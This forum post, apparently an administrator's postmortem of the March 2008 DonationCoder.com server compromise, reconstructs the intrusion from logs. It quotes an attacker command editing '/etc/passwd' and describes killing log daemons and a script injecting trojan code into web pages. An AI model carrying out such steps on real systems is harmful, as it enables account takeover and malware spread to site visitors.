351
Official Announcements / Re: Thread about the DonationCoder.com server Shutdown on March 2nd, 2008
« on: March 07, 2008, 01:38 PM »It looks like they got in using an exploit in an older version of the Subversion Version Control System (SVN) that i had installed on the server a while ago.It does look like that, but there is no way to be 100% sure.
The facts are:
- Someone logged into the svn user account (which for some reason had a bash shell bound to it instead of being pointed to /sbin/nologin or something) before logging in as root (timestamps show svn was first)
- The svn user account had " nano /etc/passwd " in it's .bash_history. It is safe to assume that they erased the .bash_history on every log-in, so it will only show the commands they ran on last login, nothing before that.
- About one hour and a half later, they logged in as root through the front door. According to the ssh logs, it seems they used a valid password. Then went straight to installing their trojan code on the webpage. As far as we can tell anyway, the .bash_history does show that it wasn't erased because it had commands in there we ran before the attack. However, they could easily manipulate it and only delete the lines they were responsible for.
- They also killed the log daemons upon login. Thus adding more uncertainty since we only have partial information.
- The attackers came from at least 3 different IP addresses:
24.39.219.73
82.201.163.136
62.13.171.41
It's most probably safe to assume that these are also hacked computers. - The way they infected the pages was by running a script called fr.sh which traversed the directories looking for index.html/htm pages (It also got 2 PHP pages that were not accessible to the public). It seems like it grabbed the code to inject from a file they created (filename was Script).